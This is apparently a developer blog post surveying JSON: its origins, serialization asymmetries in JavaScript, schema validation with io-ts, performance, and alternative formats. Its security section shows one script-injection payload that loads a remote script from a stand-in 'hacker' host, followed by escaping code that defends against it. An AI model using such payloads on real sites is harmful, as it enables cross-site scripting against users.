All things about JSON.
Begining
JSON - born out of web platform limitation and a bit of creativity. There was XMLHttpRequest to do request to the server without the need to do full reload, but XML is "heavy" on the wire, so Douglas Crockford thought of clever trick - we can use JavaScript Object Notation and eval
to pass data from the server to the client or vice versa in easy way. But it is not safe to execute arbitrary code (eval
) especially if it comes from 3rd party source. So next step was to standardize it and implement a specific parser for it. Later it becomes standard for all browsers and now we can use it as JSON.parse
.
limitation
Taking into account how it was born it comes with some limitations
Asymetric encoding/decoding
You know how JS tries to pretend that type errors doesn't exist and tries just coerce at any cost even if doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x))
doesn't always hold true. For example:
-
Date
will be turned instring
representation, and after decoding it will stay astring
-
Map
,WeakMap
,Set
,WeakSet
will be turned in"{}"
- it will lose contents and type -
BigInt
for a change throwsTypeError: Do not know how to serialize a BigInt
- a function will be converted to
undefined
-
undefined
will be converted toundefined
- ES6 class and
new function(){}
will be converted into a representation of a plain object, but will lose type
Solution: One of possible solutions here is to use static type systems like TypeScript or Flow to prevent asymmetric types:
// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
| string
| number
| boolean
| null
| JSONObject
| JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;
export const symetricStringify = (x: JSONValue) => JSON.stringify(x);
Though it will not save us from TypeError: Converting circular structure to JSON
, but will get to it later.
Security: script injection
If you use JSON as a way to pass data from the server to the client inside HTML, for example, the initial value for Redux store in case of server-side rendering or gon
in Ruby, be aware that there a risk of script injection attack
<script>
var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
Solution: escape JSON before passing it to HTML
const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
"<": "\\u003C",
">": "\\u003E",
"/": "\\u002F",
"\u2028": "\\u2028",
"\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
Side note: collection of JSON implementation vulnerabilities
Lack of schema
JSON is schemaless - it makes sense because JS is dynamically typed. But this means that you need to verify shape (types) yourself JSON.parse
won't do it for you.
Solution: I wrote about this problem before - use IO validation
Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.
Lack of schema and serializer/parser
Having a schema for parser can solve the issue with asymmetry for Date
. If we know that we expect Date
at some place we can use string representation to create JS Date
out of it.
Having a schema for serializer can solve issue for BigInt
, Map
, WeakMap
, Set
, WeakSet
, ES6 classes and new function(){}
. We can provide specific serializer/parser for each type.
import * as t from 'io-ts'
const DateFromString = new t.Type<Date, string>(
'DateFromString',
(m): m is Date => m instanceof Date,
(m, c) =>
t.string.validate(m, c).chain(s => {
const d = new Date(s)
return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
}),
a => a.toISOString()
)
Side note: see also this proposal
Lack of schema and performance
Having a schema can improve the performance of parser. For example, see jitson and FAD.js
Side note: see also fast-json-stringify
Stream parser/serializer
When JSON was invented nobody thought about using it for gigabytes of data. If you want to do something like this take a look at some stream parser.
Also, you can use a JSON stream to improve UX for slow backend - see oboejs.
Beyond JSON
uneval
If you want to serialize actual JS code and preserve types, references and cyclic structures JSON will be not enough. You will need "uneval". Checkout some of those:
- devalue
- lave
- js-stringify
- node-uneval
- node-tosource - Converts JavaScript objects to source
Other "variations to this tune":
- LJSON - JSON extended with pure functions
- serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
- arson - Efficient encoder and decoder for arbitrary objects
- ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
- serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes
As a configuration file
JSON was invented to transmit data, not for storing configuration. Yet people use it for configuration because this is an easy option.
JSON lacks comments, requires quotes around keys, prohibits coma at the end of array or dictionary, requires paired {}
and []
. There is no real solution for this excepts use another format, like JSON5 or YAML or TOML.
Binary data
JSON is more compact than XML, yet not the most compact. Binary formats even more effective. Checkout MessagePack.
Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.
Binary data and schema
Having binary format with schema allows doing some crazy optimization, like random access or zero-copy. Check out Cap-n-Proto.
Query language
JSON (as anything JS related) is super popular, so people need to work with it more and more and started to build tools around it, like JSONPath and jq.
Did I miss something?
Leave a comment if I missed something. Thanks for reading.